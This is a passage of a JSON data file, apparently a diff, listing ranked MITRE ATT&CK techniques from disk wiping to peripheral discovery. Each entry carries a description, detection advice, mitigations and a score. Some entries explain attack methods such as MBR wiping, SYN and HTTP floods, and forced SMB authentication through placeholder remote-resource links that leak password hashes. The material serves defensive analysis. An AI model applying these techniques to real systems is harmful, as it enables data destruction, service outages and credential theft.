Wipe", + "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: Novetta Blockbuster Destructive Malware)", + "url": "https://attack.mitre.org/techniques/T1561", + "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "score": 0.42466122285714286, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "subtechniques": [ + { + "tid": "T1561.001", + "name": "Disk Wipe: Disk Content Wipe", + "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like RawDisk to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: Novetta Blockbuster Destructive Malware)", + "url": "https://attack.mitre.org/techniques/T1561/001", + "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + }, + { + "tid": "T1561.002", + "name": "Disk Wipe: Disk Structure Wipe", + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "url": "https://attack.mitre.org/techniques/T1561/002", + "detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + } + ] + }, + { + "rank": 146, + "tid": "T1499", + "name": "Endpoint Denial of Service", + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\nFor attacks attempting to saturate the providing network, see Network Denial of Service.", + "url": "https://attack.mitre.org/techniques/T1499", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "score": 0.4139285714285714, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [ + { + "tid": "T1499.001", + "name": "Endpoint Denial of Service: OS Exhaustion Flood", + "description": "Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", + "url": "https://attack.mitre.org/techniques/T1499/001", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.002", + "name": "Endpoint Denial of Service: Service Exhaustion Flood", + "description": "Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)", + "url": "https://attack.mitre.org/techniques/T1499/002", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.003", + "name": "Endpoint Denial of Service: Application Exhaustion Flood", + "description": "Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)", + "url": "https://attack.mitre.org/techniques/T1499/003", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.004", + "name": "Endpoint Denial of Service: Application or System Exploitation", + "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.", + "url": "https://attack.mitre.org/techniques/T1499/004", + "detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ] + }, + { + "rank": 147, + "tid": "T1008", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "url": "https://attack.mitre.org/techniques/T1008", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 0.40476190476190477, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 148, + "tid": "T1030", + "name": "Data Transfer Size Limits", + "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", + "url": "https://attack.mitre.org/techniques/T1030", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "score": 0.3952380952380953, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 149, + "tid": "T1029", + "name": "Scheduled Transfer", + "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.", + "url": "https://attack.mitre.org/techniques/T1029", + "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.", + "score": 0.3904761904761905, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [] + }, + { + "rank": 150, + "tid": "T1598", + "name": "Phishing for Information", + "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from Phishing in that the objective is gathering data from the victim rather than executing malicious code.\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages.", + "url": "https://attack.mitre.org/techniques/T1598", + "detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).", + "score": 0.38333333333333336, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1598.001", + "name": "Phishing for Information: Spearphishing Service", + "description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: Social Media or Search Victim-Owned Websites) to craft persuasive and believable lures.", + "url": "https://attack.mitre.org/techniques/T1598/001", + "detection": "Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1598.002", + "name": "Phishing for Information: Spearphishing Attachment", + "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: Search Open Websites/Domains or Search Victim-Owned Websites) to craft persuasive and believable lures.", + "url": "https://attack.mitre.org/techniques/T1598/002", + "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1598.003", + "name": "Phishing for Information: Spearphishing Link", + "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: Establish Accounts or Compromise Accounts) and/or sending multiple, seemingly urgent messages.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: Search Open Websites/Domains or Search Victim-Owned Websites) to craft persuasive and believable lures.", + "url": "https://attack.mitre.org/techniques/T1598/003", + "detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ] + }, + { + "rank": 151, + "tid": "T1016", + "name": "System Network Configuration Discovery", + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.\nAdversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "url": "https://attack.mitre.org/techniques/T1016", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.3721343876190476, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1016.001", + "name": "System Network Configuration Discovery: Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using Ping, tracert, and GET requests to websites.\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "url": "https://attack.mitre.org/techniques/T1016/001", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "mitigations": [] + } + ] + }, + { + "rank": 152, + "tid": "T1129", + "name": "Shared Modules", + "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\nThe module loader can load DLLs:\n
    \n
  • \nvia specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n
    • \n
  • \nvia EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n
    • \n
  • \nvia an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n
    • \n
  • \nvia <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n
    • \n
\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.", + "url": "https://attack.mitre.org/techniques/T1129", + "detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "score": 0.37172472142857144, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "subtechniques": [] + }, + { + "rank": 153, + "tid": "T1187", + "name": "Forced Authentication", + "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n
    \n
  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
    • \n
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)
    • \n
", + "url": "https://attack.mitre.org/techniques/T1187", + "detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", + "score": 0.35476190476190483, + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 154, + "tid": "T1007", + "name": "System Service Discovery", + "description": "Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using Tasklist, and \"net start\" using Net, but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "url": "https://attack.mitre.org/techniques/T1007", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.3238095238095238, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 155, + "tid": "T1120", + "name": "Peripheral Device Discovery", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", + "url": 